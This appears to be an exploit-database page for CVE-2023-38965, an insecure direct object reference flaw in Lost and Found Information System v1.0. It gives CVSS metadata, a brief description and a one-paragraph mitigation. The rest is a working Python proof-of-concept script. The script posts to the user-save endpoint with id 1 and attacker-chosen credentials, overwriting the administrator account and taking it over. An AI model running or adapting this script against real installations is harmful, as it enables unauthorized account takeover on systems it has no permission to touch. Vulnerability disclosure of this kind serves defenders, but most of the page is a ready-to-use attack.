header-logo
Suggest Exploit
vendor:
Lost and Found Information System
by:
OR4NG.M4N
8.1
CVSS
CRITICAL
Insecure Direct Object Reference (IDOR)
639
CWE
Product Name: Lost and Found Information System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2023-38965
CPE: a:lost_and_found_information_system:lost_and_found_information_system:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2023

Lost and Found Information System v1.0 – Insecure Direct Object Reference leads to Account Takeover

The Lost and Found Information System v1.0 is vulnerable to an Insecure Direct Object Reference (IDOR) attack, which can be exploited by an authenticated attacker to take over user accounts. By manipulating the 'id' parameter in the POST request to '/classes/Users.php?f=save', an attacker can modify user information and potentially gain unauthorized access to other user accounts. This vulnerability has been assigned CVE-2023-38965.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper access controls and authorization checks to ensure that users can only modify their own accounts. Additionally, sensitive user data should be encrypted and protected to prevent unauthorized access.
Source

Exploit-DB raw data:

# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over 
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965

Python p0c :

import argparse
import requests
import time
parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()


url = args.url + '/classes/Users.php?f=save'


data = {
    'id': '1',
    'firstname': 'or4ng',
    'middlename': '',
    'lastname': 'Admin',
    'username': args.user,
    'password': args.password
}

response = requests.post(url, data)
if b"1" in response.content:
    print("Exploit ..")
    time.sleep(1)
    print("User :" + args.user + "\nPassword :" + args.password)
else:
    print("Exploit Failed..")